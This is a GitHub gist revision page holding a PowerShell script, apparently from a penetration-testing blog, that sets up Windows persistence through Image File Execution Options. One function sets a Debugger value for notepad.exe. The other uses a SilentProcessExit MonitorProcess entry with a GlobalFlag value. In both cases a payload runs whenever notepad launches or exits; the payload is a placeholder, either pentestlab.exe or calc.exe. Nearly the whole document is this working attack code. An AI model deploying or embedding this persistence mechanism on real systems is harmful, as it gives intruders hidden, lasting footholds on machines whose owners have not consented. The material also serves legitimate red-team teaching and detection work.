-
-
Save ashr/252c9729e398548b1f2d8ff58e5c61d3 to your computer and use it in GitHub Desktop.
Revisions
-
netbiosX revised this gist
Jan 13, 2020 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -3,7 +3,8 @@ License: GPLv3 Author: @netbiosX #> # Image File Execution Options Injection Persistence Technique # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ function Persist-Debugger -
Jan 7, 2020 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -26,7 +26,7 @@ function Persist-Debugger $GetIFEO = Get-Item -Path "$GetRegKey" $Payload = 'calc.exe' $GetIFEO | Set-ItemProperty -Name Debugger -Value $Payload } @@ -57,7 +57,7 @@ function Persist-GlobalFlags $GetIFEO = Get-Item -Path "$GetRegKey" $GetIF = Get-Item -Path "$GetReg" $Payload = 'C:\Windows\System32\calc.exe' $GetIFEO | New-ItemProperty -Name MonitorProcess -Value $Payload $GetIFEO | New-ItemProperty -Name ReportingMode -Value 1 -PropertyType "DWORD" -
Jan 1, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,67 @@ <# ImageFileExecutionOptions v1.0 License: GPLv3 Author: @netbiosX #> # Image File Execution Options Injection Persistence Technique function Persist-Debugger { $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Push-Location Set-Location $Registry if(Test-Path "$Registry\Image File Execution Options\notepad.exe"){ Write-Verbose 'Key Already Exists' -Verbose }else{ New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe' $GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe' $GetIFEO = Get-Item -Path "$GetRegKey" $Payload = 'pentestlab.exe' $GetIFEO | Set-ItemProperty -Name Debugger -Value $Payload } } function Persist-GlobalFlags { $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Push-Location Set-Location $Registry if(Test-Path "$Registry\SilentProcessExit"){ Write-Verbose 'Key Already Exists' -Verbose }else{ New-Item -Path "$Registry" -Name 'SilentProcessExit' New-Item -Path "$Registry\SilentProcessExit" -Name 'notepad.exe' New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe' $GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe' $GetReg = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe' $GetIFEO = Get-Item -Path "$GetRegKey" $GetIF = Get-Item -Path "$GetReg" $Payload = 'C:\temp\pentestlab.exe' $GetIFEO | New-ItemProperty -Name MonitorProcess -Value $Payload $GetIFEO | New-ItemProperty -Name ReportingMode -Value 1 -PropertyType "DWORD" $GetIF | New-ItemProperty -Name GlobalFlag -Value 512 -PropertyType "DWORD" } }